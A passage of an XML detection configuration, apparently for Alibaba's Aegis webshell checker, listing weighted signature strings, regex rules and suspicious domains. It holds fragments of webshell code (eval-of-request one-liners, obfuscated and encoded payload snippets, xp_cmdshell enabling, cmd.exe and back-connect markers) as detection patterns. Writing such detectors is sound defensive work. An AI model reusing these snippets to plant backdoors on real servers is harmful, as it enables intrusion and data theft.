<NUM>20</NUM> </ITEM> <ITEM> <STR>System.getProperty("os.version"</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>System.getProperty("os.arch")</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>array('files'=>'utils.js,transport.js'</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>ttfc.v5cx.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>FormColorBorder="#600000"</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>AmSize="11px"</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>menuColor="#111"</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>mName="</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>SiteURL="</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>Copyright="</STR> <NUM>10</NUM> </ITEM> 
<ITEM> <STR>AD="</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>$sess_cookie = "cyb3rvars";</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>http-equiv=MSThemeCompatible</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>rel=stylesheet type=text/css href=</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>http://www.fa56888.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[119489998</title>]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[LANGUAGE = VBScript.Encode</title>]]></STR> <NUM>30</NUM> </ITEM> <ITEM> <STR><![CDATA[UserPass=</title>]]></STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>GIF89a</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR><![CDATA[<%eval request]]></STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>request("maniandajiok")</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<%execute(request]]></STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>Connection GC(String s)throws Exception{String[] x=s.trim().split</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>3vww7f6dscedrt0dktbx2rqx5fh9tjdjpg71byr5th6tsbpulbb8gmg3</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<title>JspDo Code By Xiao.3]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>String PW_SESSION_ATTRIBUTE = "JspSpyPwd"</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<title>string vbhLn="ASPXSpy"]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>1.81949.com/mb/images/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>www.cc0777.com/mb/images/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>ttwg.pw/mb/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<?php @eval($_POST]]></STR> <NUM>20</NUM> </ITEM> <ITEM> <STR><![CDATA[<?eval]]></STR> <NUM>20</NUM> </ITEM> <ITEM> <STR><![CDATA[<!--qq5592774 -->]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>0x4D5A90000300000004000</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>853422.134209.20la.com.cn</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>www.0057888.com/mb/images/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>$infile22 = $folderpath . "page_22.html";</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>$infile21 = $folderpath . 
"page_21.html";</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>$infile20 = $folderpath . "page_20.html";</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR><![CDATA[<TITLE><?php echo $SFileName ?></TITLE>]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>www6661222.com/mb/images/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>255667.com/mb/public/css/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>zzelle.com/mb/public/css/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>FileWriter jshell = null</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<title>WWW.XXDDOS.COM</title>]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>ack_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPW</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<?php eval($_POST[]]></STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>767002.com/mb/images/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR> JFIF </STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>bc057.com/css/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>String strThisFile="JFileMan.jsp"</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5])</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>string='e'.'v'.'a'.'l'.'($g($b($enfile)))','a'</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<title> Envl PHP Shell]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>// * for any hostname (remember: /setvhost</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR><![CDATA[var $config = array("server"=>"]]></STR> <NUM>20</NUM> </ITEM> <ITEM> <STR><![CDATA[$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>www.828777.com/mb/images/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>955947.com/mb/2.css</STR> <NUM>70</NUM> </ITEM> <ITEM> 
<STR>23.245.198.139:88/files/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>\n{ n{7\l{ry}]rvnx~}FBBBBBBBBB</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>97a103a101a110a116a61a114a101a113a117a101a11</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>public br,ygv,gbc,ydo,yka,wzd,sod,vmd</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>21,23,25,79,80,110,135,137,138,139,143,443,445,1433,3306,3389,43958</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[type=index.asp&host="&host_name&"&directory="&Branch_directory]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[type=index.php&host=".$host_name."&directory=".$Branch]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>cr88888.com/mb/js.js</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>$request_content=GetHtml($Remote_server.'/</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>$arrChar = '012qwertyuiopasdfghjklzxcvbnm3456789';</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>http://www.5738888.com/js/ad2.js</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>http://odayexp.com/h4cker/mmgx/</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067</STR> <NUM>70</NUM> </ITEM> </DELETE> <language> <processor>com.alibaba.security.aegis.webshell.checker.impl.DefaultWebShellChecker</processor> <threshold>70</threshold> <WEBSHELL> <ITEM> <STR>gif87a</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>Then Execute(Session("lcx"</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>Response.Write(eval(Request.ITEM</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>GetObject("IIS://127.0.0.1/W3SVC/"</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>By Marcos</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>chopper</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>HYTop.mdb</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>C:\\Progra~1</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>Servu</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>LyfUpload.UploadFile</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>cmd.exe</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>ServerVariables("SERVER_SOFTWARE")</STR> <NUM>5</NUM> </ITEM> <ITEM> 
<STR>Environment.GetLogicalDrives</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>Evilspy</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>GetObject("WinNT://</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>webshell</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>WebAdmin2Y.x.y("add6bb58e139be10")</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>lake2</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>.GetFolder(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>Password</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>UserPass</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>VBScript.encode</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>.CreateTextFile</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>ipconfig -all</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>kj021320</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>unhonker.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>xiaf.info</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>22dm.net</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>cmd.exe /c</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>RegEdit.exe /e</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>/bin/sh</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>net user</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>STRing jksessionpass</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>ASPYDrvsInfo</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>.CopyFolder</STR> <NUM>5</NUM> </ITEM> <ITEM> <STR>.deletefile</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>.ComputerName</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>.CopyFile</STR> <NUM>5</NUM> </ITEM> <ITEM> <STR>LocalAdminiSTRator</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>Serv-U</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>System.Environment.SystemDirectory</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>System.Net.Sockets</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>System.Diagnostics</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>System.DirectoryServices</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>System.ServiceProcess</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>new Socket(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>Runtime.getRuntime(</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>xp_cmdshell</STR> <NUM>20</NUM> </ITEM> <ITEM> 
<STR>Microsoft.XMLHTTP</STR> <NUM>5</NUM> </ITEM> <ITEM> <STR>System.Reflection.Assembly.Load(Request.BinaryRead</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>WScript.Shell</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>FileOutputSTReam</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>72C24DD5-D70A-438B-8A42-98424B88AFB8</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>F935DC22-1CF0-11D0-ADB9-00C04FD58A0B</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>13709620-C279-11CE-A49E-444553540000</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>093FF809-1EA0-4079-9525-9614C3504B74</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>F935DC26-1CF0-11D0-ADB9-00C04FD58A0B</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>0D43FE01-F093-11CF-8940-00A0C9054228</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>Scripting.FileSystemObject</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>ADODB.STReam</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>BackDoor</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>command.com</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>uploadvirus</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>s;xvj4kjmx}4LkYMb@#@&?4kUlU6(L/D.P{PI2sl1+v?4kjC</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>hack.cctve.cn</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>fuckanquangoutezheng</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>OleDbConnection(session("DBC")) inSTR(DB_CSTRing.Text,":\")</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>sk8t9hSDALYDYBi0HCaGRxSgH5KgABYDYBg4Q</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>crypt_PRO="0mWm2/,5</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>WICXlQa33rNDnBUKHvXcMsQmWDL4e</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>#@~^k0oAAA==@#@&D]kJ@!tYsV@*@!</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$adminport=43958;</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>SessionName="ASPXSpy";</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>-SETDOMAIN"&vbcrlf&"-Domain=cctv|0.0.0.0|43859|-1|1|0"</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>ShowFolder("C:\\RECYCLER</STR> <NUM>80</NUM> </ITEM> <ITEM> 
<STR>http://127.0.0.1:"&port&"/goldsun/upadmin/s1</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Addxp_cmdshell(SQL2005)</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>awen asp.net webshell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>void cmdExe_Click(object sender, System.EventArgs e)</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>AK-74 Security Team Web Shell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;\</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Rp=Co&"?pw="&Server.URlEncode(Request("jl"))&"&ib="&Request("ib")</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>1902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B19</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>s"&"cri"&"pting"&"."&"Fil"&"eSy"&"stemO"&"bject</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>spider,robot,Baidu,Google,360spider,sogou,soso</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>googlebot|baiduspider|sogou|yahoo|soso</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>,"baiduspider","yahoo! 
slurp","inktomi","msnbot","</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>bfafsfef6f4f_ffdffeffcffoffdffef</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")</STR> <NUM>80</NUM> </ITEM> <RULE> <ITEM>[^\w](Eval|eval|Execute|execute|Eval_r|ExecuteGlobal).{0,3}(UnEncode|request|Request|session|Request.Item|Request.form|Session)(\(|\[)[^\{\}]{0,22}\)</ITEM> <ITEM>^gif89a</ITEM> </RULE> <ITEM> <STR>/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>"D","7","S","O","q","G","j","l","z","4","L","k","m","x","0","c","v"</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>97a103a101a110a116a61a114a101a113a117a101a115a116a46a115a10</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR> <![CDATA[ <%a=request("x")%> ]]> </STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA["&Branch_directory_11&"."&Branch_directory_12&"."&Branch_directory_13&"."&Branch_directory_14&"."&Branch_directory_15&"."&Branch_directory_16]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>==^#~@</STR> <NUM>20</NUM> </ITEM> </WEBSHELL> <INFORMATION> <ITEM> <STR>new Socket(AddressFamily.InterNetwork, SocketTyp</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>DDosAttack</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>Attack_Get()</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>Attack_Post()</STR> <NUM>10</NUM> </ITEM> </INFORMATION> <SEO> <ITEM> <STR>.1188588.com/mb/js1.js</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>1.81949.com/mb/images/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>23.245.198.139:88/files/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>255667.com/mb/public/css/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>51yes.com/click.aspx?id=214346876</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>767002.com/mb/images/style.css</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>8kyule.com/tz.js</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>94v587.com/include/js/hz.js</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>955947.com/mb/2.css</STR> <NUM>70</NUM> </ITEM> <ITEM> 
<STR>http://t.cn/Rvx3Kmv</STR> <NUM>70</NUM> </ITEM> </SEO> <EXT> <ITEM>asp</ITEM> <ITEM>asa</ITEM> <ITEM>cer</ITEM> <ITEM>cdx</ITEM> <ITEM>aspx</ITEM> <ITEM>jpg</ITEM> <ITEM>bmp</ITEM> <ITEM>jpeg</ITEM> <ITEM>png</ITEM> <ITEM>gif</ITEM> <ITEM>htr</ITEM> <ITEM>hdx</ITEM> <ITEM>asmx</ITEM> <ITEM>ashx</ITEM> </EXT> </language> <language> <processor>com.alibaba.security.aegis.webshell.checker.impl.DefaultWebShellChecker</processor> <threshold>80</threshold> <WEBSHELL> <ITEM> <STR>$password</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>'e'.'v'.'a'.'l'</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>$_GET["woaini"]=="91ri"</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36)</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>base64_decode(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>eval(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>exec(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>passthru(</STR> <NUM>5</NUM> </ITEM> <ITEM> <STR>system(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>shell_exec(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>proc_open(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>pcntl_exec(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>into outfile</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>load_file(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>.htaccess</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>udfdll</STR> <NUM>35</NUM> </ITEM> <ITEM> <STR>shellcode</STR> <NUM>55</NUM> </ITEM> <ITEM> <STR>@popen(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>SetHandler application/x-httpd-php</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>preg_replace($exif['Make'],$exif['Model'],'')</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>oo0o0O0o00oOo0O0o0OoO</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Eval(base64_decode(file_get_contents(base64_decode</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>eval(gzinflate(base64_decode(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>eval(gzinflate(STR_rot13(base64_decode(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>eval(gzuncompress(base64_decode(</STR> <NUM>10</NUM> </ITEM> <ITEM> 
<STR>eval(STR_rot13(</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>TG9jYXRpb24</STR> <NUM>55</NUM> </ITEM> <ITEM> <STR>base64_decode("4D5A90000300000004</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>0x4d5a4b45524e454c33322e444c4c00004c6f61644c6962726172794</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>langouster_udf.dll</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$b33 = $_SERVER['DOCUMENT_ROOT']</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>passthru($cmd)</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>PHP Web Shell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>P.h.p.S.p.y</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>phpshell</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>w4ck1ng</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>PhpSpy</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>_pass</STR> <NUM>1</NUM> </ITEM> <ITEM> <STR>b374k</STR> <NUM>79</NUM> </ITEM> <ITEM> <STR>milw0rm</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>c80</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>c100</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>STUNSHELL</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>FaTaLisTiCz</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Fx29SheLL</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>backdoor</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>$back_connect</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>r57</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>Pr!v8</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>webadmin</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>PHPJackal</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>C80madShell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Ve_cENxShell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>ipconfig -all</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>cmd.exe /c</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>/bin/sh</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>c80shell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>NGHshell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Xgr0upVN</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>call_user_func(</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>fsockopen</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>tools88.com</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>EgY_SpIdEr</STR> <NUM>80</NUM> </ITEM> 
<ITEM> <STR>XXDD0S</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>cha88.cn</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>SECFORCE</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>webshell</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>auto_prepend_file</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>Guama_</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Qingma_Auto</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>Qingma_c</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>Antivirus_e</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Exec_g</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>admin_spiderpass</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>Shell (SPS-3.0)</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Spider PHP Shell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>SELECT cmd FROM a INTO DUMPFILE</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>net start Terminal Services</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>SELECT spider FROM Spider_Temp_Tab</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>base64_decode($back_connect</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>k1r4fsearch</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>fuckanquangoutezheng</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>'\'a\'eis','e'.'v'.'a'.'l'.'($g($b($enfile)))','a'</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>3vWW7F6DsceDRT0dKtBX2rqX5Fh9tJDJpG71Byr5Th6TsbPulbB8Gmg3</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>GUuDQ0KJAAAAAAAAABe6Dg9GolWbhqJVm4aiVZu8pZdbhuJVm6ZlVhuF4lW</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$entry_line="HACKed by EntriKa";</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>cont=replace(cont,"href=""","href=""?gov.cn.")</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$dez = $pwddir."/".$real;</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>echo "FILE UPLOADED TO $dez"</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>"R0lGODlhWAKWAOf</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$ydosya2 = fopen("$ydosya", 'w')</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>fwrite($ydosya2, $kodlar)</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, 
$regs)) {</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>cat /tmp/cmdtemp; rm /tmp/cmdtemp</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$pwdump2="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>MyShell: can't change directory.\n$work_dir</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>if(get_magic_quotes_gpc())$shellOut=STRipslashes($shellOut)</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>if(file_exists("c:\\windows\\system32\\"))$dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll"</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>WWW.XXDDOS.COM</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>JCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5P</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$liz0zim=shell_exec($_POST[liz0])</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>dHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAA</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>744zdMGn59wNZsz05tcH40pO/GcCgDzJj+e</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>((!isset($key))?($key=implode('`, `',array_keys($line))):null);</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>;@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>hYSMtmdpZNpy8ZY6hBlJJxBWSVC5FiGoIRJzgYAXAW</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>Calistirmak istediginiz komutu buraya girin</STR> <NUM>80</NUM> </ITEM> <ITEM> 
